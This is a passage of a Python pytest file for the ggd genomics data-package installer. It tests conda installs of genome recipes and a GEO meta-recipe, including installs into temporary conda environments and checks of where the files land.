    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file1))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file2))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1)) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2)) == False
    ## Test that the tarfile and the pkg dir were correctly copied to the prefix
    data_packages = get_conda_package_list(temp_env)
    version = str(data_packages[name]["version"])
    build_number = str(data_packages[name]["build"])
    tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
    pkgdir = "{}-{}-{}".format(name,version,build_number)
    assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
    assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
    ### Test that the ggd_info metadata is updated with ggd pkg
    pkg_info = get_conda_package_list(temp_env,name)
    assert name in pkg_info.keys()
    version = pkg_info[name]["version"]
    build = pkg_info[name]["build"]
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
    with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
        channeldata = json.load(jfile)
        assert name in channeldata["packages"]
    ## Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_env3"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False
def test_conda_install_bad_recipe():
    """
    Test that the conda_install function properly handles a bad recipe.

    A recipe name that does not exist on the channel should make
    conda_install() exit via sys.exit().
    """
    pytest_enable_socket()
    ## Test with undesignated version
    name = "Fake_hg19-gaps"
    ggd_channel = "genomics"
    ## Hand-built channel metadata for a package that conda cannot resolve
    jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
                {u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
                u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                u'hg19', u'species': u'Homo_sapiens'}}}}
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.conda_install([name], ggd_channel,jdict)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
def test_conda_install():
    """
    Test conda install function for proper installation of a ggd recipe using conda.

    Installs a single recipe and checks its data files plus the ggd_info
    metadata (noarch tarball + channeldata.json) in the current conda root,
    uninstalls it, then repeats with a list of two recipes.
    """
    pytest_enable_socket()
    ## Make sure hg19-gaps-ucsc-v1 is not already installed (best effort)
    try:
        uninstall_hg19_gaps_ucsc_v1()
    except:
        pass
    name = "hg19-gaps-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(name,ggd_channel)
    species = jdict["packages"][name]["identifiers"]["species"]
    build = jdict["packages"][name]["identifiers"]["genome-build"]
    version = jdict["packages"][name]["version"]
    assert install.conda_install([name], ggd_channel,jdict) == True
    ### Test that the file is in the correct prefix (the current conda root)
    file1 = "{}.bed.gz".format(name)
    file2 = "{}.bed.gz.tbi".format(name)
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2))
    ### Test that the ggd_info metadata is updated with ggd pkg
    pkg_info = get_conda_package_list(utils.conda_root(),name)
    assert name in pkg_info.keys()
    version = pkg_info[name]["version"]
    build = pkg_info[name]["build"]
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
    with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
        channeldata = json.load(jfile)
        assert name in channeldata["packages"]
    #### Uninstall package
    args = Namespace(channel='genomics', command='uninstall', names=[name])
    uninstall.uninstall((),args)
    ## Test with multiple in the list
    ggd_recipes = ["grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]
    assert install.conda_install(ggd_recipes, ggd_channel,jdict) == True
    for name in ggd_recipes:
        pkg_info = get_conda_package_list(utils.conda_root(),name)
        version = pkg_info[name]["version"]
        build = pkg_info[name]["build"]
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
        with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
            channeldata = json.load(jfile)
            assert name in channeldata["packages"]
    ## Clean up: uninstall both recipes in one call
    args = Namespace(channel='genomics', command='uninstall', names=ggd_recipes)
    assert uninstall.uninstall((),args) == True
def test_conda_install_with_prefix_set():
    """
    Test conda install function for proper installation of a ggd recipe using conda
    into a different conda prefix.

    Creates a throw-away conda env ("temp_env4"), installs a recipe into it,
    verifies the data files, conda pkgs dir, and ggd_info metadata landed in
    the env (and not in the current conda root), then removes the env.
    """
    pytest_enable_socket()
    ## Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env4")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_env4"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_env4"])
    name = "hg19-pfam-domains-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(name,ggd_channel)
    ## conda_install reads CONDA_SOURCE_PREFIX from the environment
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
    assert install.conda_install([name], ggd_channel,jdict,prefix=temp_env) == True
    species = jdict["packages"][name]["identifiers"]["species"]
    build = jdict["packages"][name]["identifiers"]["genome-build"]
    version = jdict["packages"][name]["version"]
    ## The data files must exist in the temp env prefix, not the conda root
    file1 = "{}.bed12.bed.gz".format(name)
    file2 = "{}.bed12.bed.gz.tbi".format(name)
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file1))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file2))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1)) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2)) == False
    ## Test that the tarfile and the pkg dir were correctly copied to the prefix
    data_packages = get_conda_package_list(temp_env)
    version = str(data_packages[name]["version"])
    build_number = str(data_packages[name]["build"])
    tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
    pkgdir = "{}-{}-{}".format(name,version,build_number)
    assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
    assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
    ### Test that the ggd_info metadata is updated with ggd pkg
    pkg_info = get_conda_package_list(temp_env,name)
    assert name in pkg_info.keys()
    version = pkg_info[name]["version"]
    build = pkg_info[name]["build"]
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
    with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
        channeldata = json.load(jfile)
        assert name in channeldata["packages"]
    ## Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_env4"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False
def test_conda_install_meta_recipe():
    """
    Test that the conda_install() method correctly install a meta recipe.

    Scenarios covered:
      1) conda_install() raises SystemExit when a meta recipe is passed with
         meta_recipe=False (a meta recipe must be explicitly designated).
      2) The meta recipe installs into the current environment, and the built
         tarball's info/recipe/recipe.sh and meta.yaml.template are rewritten
         for the GSE123 accession (updated species, parent-meta-recipe, etc.).
      3) The meta recipe installs into a separate conda prefix, leaving the
         current environment's share/ggd tree untouched.
      4) The package tarball, pkgs/ directory, and ggd_info metadata
         (noarch tarball + channeldata.json) end up in the target prefix.

    NOTE(review): integration test — requires network access (wget from
    GitHub, curl from GEO inside the recipe) and permission to create/remove
    conda environments.
    """
    import tarfile
    import tempfile
    from ggd import check_recipe

    ## Stage a local copy of the GEO meta recipe, renamed for the GSE123 accession
    tmpdir = tempfile.mkdtemp()
    recipe_path = os.path.join(tmpdir,"gse123-geo-v1")
    os.mkdir(recipe_path)

    ## Download the meta recipe files from the ggd-recipes repo
    try:
        ## checksum file
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
                       "--directory-prefix",
                       recipe_path])

        ## meta.yaml
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
                       "--directory-prefix",
                       recipe_path])

        ## metarecipe.sh
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
                       "--directory-prefix",
                       recipe_path])

        ## header parser
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
                       "--directory-prefix",
                       recipe_path])

        ## Post link
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
                       "--directory-prefix",
                       recipe_path])

        ## recipe.sh
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
                       "--directory-prefix",
                       recipe_path])

    except sp.CalledProcessError as e:
        print(str(e))
        assert False

    ## Rename the recipe inside every downloaded file to the accession-specific name
    for f in os.listdir(recipe_path):
        content = [x.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1") for x in open(os.path.join(recipe_path,f))]
        with open(os.path.join(recipe_path,f), "w") as out:
            out.write("".join(content))

    ## Original yaml (kept to compare against the post-install rewritten yaml)
    orig_yaml = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))

    tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
    assert os.path.isfile(tarball_file_path)

    ## Set up channel metadata dict (fake channeldata for the local build)
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'gse123-geo-v1': {u'activate.d':
                False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                u'noarch/gse123-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                u'meta-recipe', u'species': u'meta-recipe'}}}}

    ## Test installing a meta recipe without the meta-recipe designation:
    ## expected to exit (SystemExit) rather than install
    passed = False
    try:
        install.conda_install(ggd_recipes=["gse123-geo-v1"],
                              ggd_channel = "genomics",
                              ggd_jdict = ggd_jdict,
                              debug = False,
                              prefix = None,
                              meta_recipe = False,
                              meta_recipe_name = "meta-recipe-geo-accession-v1")
        passed = True
    except SystemExit as e:
        pass
    except Exception as e:
        assert False
    assert not passed

    ## Test meta recipe install; meta-recipe env vars are supplied through a temp file
    env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()

    ## Set environ vars consumed by the meta-recipe machinery during install
    os.environ["GGD_METARECIPE_ID"] = "GSE123"
    os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
    os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files

    ## Test that the recipe is installed, the recipe.sh file is updated, and the meta.yaml file is updated
    assert install.conda_install(ggd_recipes=["gse123-geo-v1"],
                                 ggd_channel = "genomics",
                                 ggd_jdict = ggd_jdict,
                                 debug = False,
                                 prefix = None,
                                 meta_recipe = True,
                                 meta_recipe_name = "meta-recipe-geo-accession-v1")

    ## Pull the rewritten recipe.sh and meta.yaml.template back out of the cached tarball
    recipe_contents = ""
    yaml_dict = {}
    with tarfile.open(os.path.join(utils.conda_root(),"pkgs",os.path.basename(tarball_file_path)), mode="r|bz2") as tf:
        for info in tf:
            if info.name == "info/recipe/recipe.sh":
                recipe_contents = tf.extractfile(info)
                recipe_contents = recipe_contents.read().decode()
            elif info.name == "info/recipe/meta.yaml.template":
                yaml_dict = tf.extractfile(info)
                yaml_dict = yaml.safe_load(yaml_dict.read().decode())

    ## Check the recipe contents: the generic meta recipe script should have been
    ## replaced with the concrete GSE123 download commands
    assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")

    ## check the yaml file: identity fields unchanged, GEO-derived fields updated
    assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
    assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
    assert yaml_dict["package"]["name"] == orig_yaml["package"]["name"]
    assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
    assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
    assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
    assert "updated-species" in yaml_dict["about"]["identifiers"]
    assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
    assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
    assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-v1"
    assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
    assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
    assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
    assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
    assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]

    ## Check the installed files landed in the current environment's share/ggd tree
    species = "meta-recipe"
    build = "meta-recipe"
    name = "gse123-geo-v1"
    version = "1"
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
    assert not os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exist after install

    ## remove the temp dir
    if os.path.exists(env_var_tmp_dir):
        shutil.rmtree(env_var_tmp_dir)

    ## uninstall
    sp.check_call(["ggd","uninstall","gse123-geo-v1"])

    ## Check different prefix
    ## Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_meta_recipe")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_meta_recipe"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_meta_recipe"])

    ## Build the recipe again (previous tarball was consumed by the first install)
    tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
    assert os.path.isfile(tarball_file_path)

    ## Fresh meta-recipe env var files for the prefix install
    env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()

    ## Set environ vars; CONDA_SOURCE_PREFIX marks the env the install is driven from
    os.environ["GGD_METARECIPE_ID"] = "GSE123"
    os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
    os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()

    assert install.conda_install(ggd_recipes=["gse123-geo-v1"],
                                 ggd_channel = "genomics",
                                 ggd_jdict = ggd_jdict,
                                 debug = False,
                                 prefix = temp_env,
                                 meta_recipe = True,
                                 meta_recipe_name = "meta-recipe-geo-accession-v1")

    ## Inspect the tarball copied into the TARGET prefix this time
    recipe_contents = ""
    yaml_dict = {}
    with tarfile.open(os.path.join(temp_env,"pkgs",os.path.basename(tarball_file_path)), mode="r|bz2") as tf:
        for info in tf:
            if info.name == "info/recipe/recipe.sh":
                recipe_contents = tf.extractfile(info)
                recipe_contents = recipe_contents.read().decode()
            elif info.name == "info/recipe/meta.yaml.template":
                yaml_dict = tf.extractfile(info)
                yaml_dict = yaml.safe_load(yaml_dict.read().decode())

    ## Check the recipe contents
    assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")

    ## check the yaml file (same expectations as the non-prefix install)
    assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
    assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
    assert yaml_dict["package"]["name"] == orig_yaml["package"]["name"]
    assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
    assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
    assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
    assert "updated-species" in yaml_dict["about"]["identifiers"]
    assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
    assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
    assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-v1"
    assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
    assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
    assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
    assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
    assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]

    ## Check the installed files exist in the target prefix
    species = "meta-recipe"
    build = "meta-recipe"
    name = "gse123-geo-v1"
    version = "1"
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
    assert not os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exist after install

    ## Check that the recipe was not installed in the current environment
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz")) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) == False

    ## Test that the tarfile and the pkg dir were correctly copied to the prefix
    data_packages = get_conda_package_list(temp_env, include_local = True)
    version = str(data_packages[name]["version"])
    build_number = str(data_packages[name]["build"])
    tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
    pkgdir = "{}-{}-{}".format(name,version,build_number)

    assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
    assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))

    ### Test that the ggd_info metadata is updated with ggd pkg
    pkg_info = get_conda_package_list(temp_env,name, include_local = True)
    assert name in pkg_info.keys()
    version = pkg_info[name]["version"]
    build = pkg_info[name]["build"]
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
    assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
    with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
        channeldata = json.load(jfile)
        assert name in channeldata["packages"]

    ## Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_meta_recipe"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False

    ## remove the temp dirs
    if os.path.exists(env_var_tmp_dir):
        shutil.rmtree(env_var_tmp_dir)

    if os.path.exists(tmpdir):
        shutil.rmtree(tmpdir)
def test_get_file_location():
    """
    Test that the get_file_locations function properly retrieves the location
    of ggd files.

    Two phases:
      1) A fake, never-installed recipe: get_file_locations() should report
         an installation error and must NOT emit the $ggd_*_dir/$ggd_*_file
         environment variables for it.
      2) A real cached recipe installed via install_from_cached(): the env
         variables and the install path should appear in the output.

    NOTE(review): integration test — requires network access and a writable
    conda environment.
    """
    pytest_enable_socket()

    ## Phase 1: fake recipe with hand-built channel metadata
    ggd_recipe = "Fake_hg19-gaps"
    ggd_channel = "genomics"

    jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
            {u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
            u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
            {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
            u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
            u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
            u'hg19', u'species': u'Homo_sapiens'}}}}

    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.get_file_locations([ggd_recipe],jdict)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: There was an error during installation" in output
    assert ":ggd:install: Installed file locations" in output
    assert ggd_recipe in output
    ## A recipe that failed to install must not advertise env variables
    assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) not in output
    assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) not in output

    ## Phase 2: real cached recipe
    ggd_recipe = "grch37-chromsizes-ggd-v1"
    ggd_channel = "genomics"

    jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
    assert install.install_from_cached([ggd_recipe], ggd_channel,jdict) == True

    ## Re-fetch the metadata and derive the expected install path
    jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
    species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
    build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
    version = jdict["packages"][ggd_recipe]["version"]
    CONDA_ROOT = utils.conda_root()
    path = os.path.join(CONDA_ROOT,"share","ggd",species,build,ggd_recipe,version)

    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.get_file_locations([ggd_recipe],jdict)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: Installed file locations" in output
    assert ggd_recipe in output
    assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) in output
    assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) in output
    assert path in output

    ## Best-effort cleanup: uninstall may sys.exit or raise; either way the
    ## test outcome should not depend on it. (Fixed: was a bare "except:",
    ## which also swallowed KeyboardInterrupt.)
    try:
        args = Namespace(channel='genomics', command='uninstall', names=[ggd_recipe])
        uninstall.uninstall((),args)
    except (SystemExit, Exception):
        pass
def test_get_file_location_with_prefix_set():
    """
    Test that get_file_location function to properly reterive the location of
    the ggd file when it is associated with a different prefix (conda
    environment).

    Installs a cached recipe into a freshly created temp env ("temp_env5"),
    checks that get_file_locations() reports the env-specific path and the
    prefix-specific NOTE, and that the data files exist only in the temp env
    (not in the current conda root). The temp env is removed at the end.

    NOTE(review): integration test — requires network access and permission
    to create/remove conda environments.
    """
    pytest_enable_socket()

    ### Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env5")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_env5"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_env5"])

    ### Install the recipe into the temp env
    ggd_recipe = "hg19-pfam-domains-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
    species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
    build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
    version = jdict["packages"][ggd_recipe]["version"]
    ## CONDA_SOURCE_PREFIX marks the environment the install is driven from
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
    assert install.install_from_cached([ggd_recipe], ggd_channel,jdict,prefix=temp_env) == True
    path = os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version)

    ### Test output from get file location, passing the temp env as the prefix
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.get_file_locations([ggd_recipe],jdict,prefix=temp_env)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: Installed file locations" in output
    assert ggd_recipe in output
    assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) in output
    assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) in output
    assert path in output
    ## The env vars only exist inside the target environment; the NOTE says so
    assert ":ggd:install: NOTE: These environment variables are specific to the {p} conda environment and can only be accessed from within that environment".format(p=temp_env) in output

    ### Test the file exists in the correct prefix and not the current prefix
    file1 = "{}.bed12.bed.gz".format(ggd_recipe)
    file2 = "{}.bed12.bed.gz.tbi".format(ggd_recipe)
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file1))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file2))
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file1)) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file2)) == False

    ### Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_env5"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False
def test_install_checksum():
    """
    Test the install_checksum method.

    Scenarios covered:
      1) Good checksum: a locally built/installed recipe validates against
         its checksums_file.txt and reports a successful checksum.
      2) Missing checksum file in the cached tarball: a WARNING is printed
         and validation is skipped.
      3) Bad checksum record: install_checksum() raises ChecksumError.
      4) Install directory removed: install_checksum() raises ChecksumError.

    Fixes applied in review:
      - The pre-existing-install guard used the misspelled name
        "trail-recipe-v1" and therefore could never match; corrected to
        "trial-recipe-v1".
      - The final `except Exception:` handler did not bind the exception
        (`as e`) yet called print(str(e)), which raised a NameError and
        masked the real failure.
      - Removed commented-out test code.

    NOTE(review): integration test — requires network access (the recipe's
    wget) and a writable conda environment.
    """
    pytest_enable_socket()

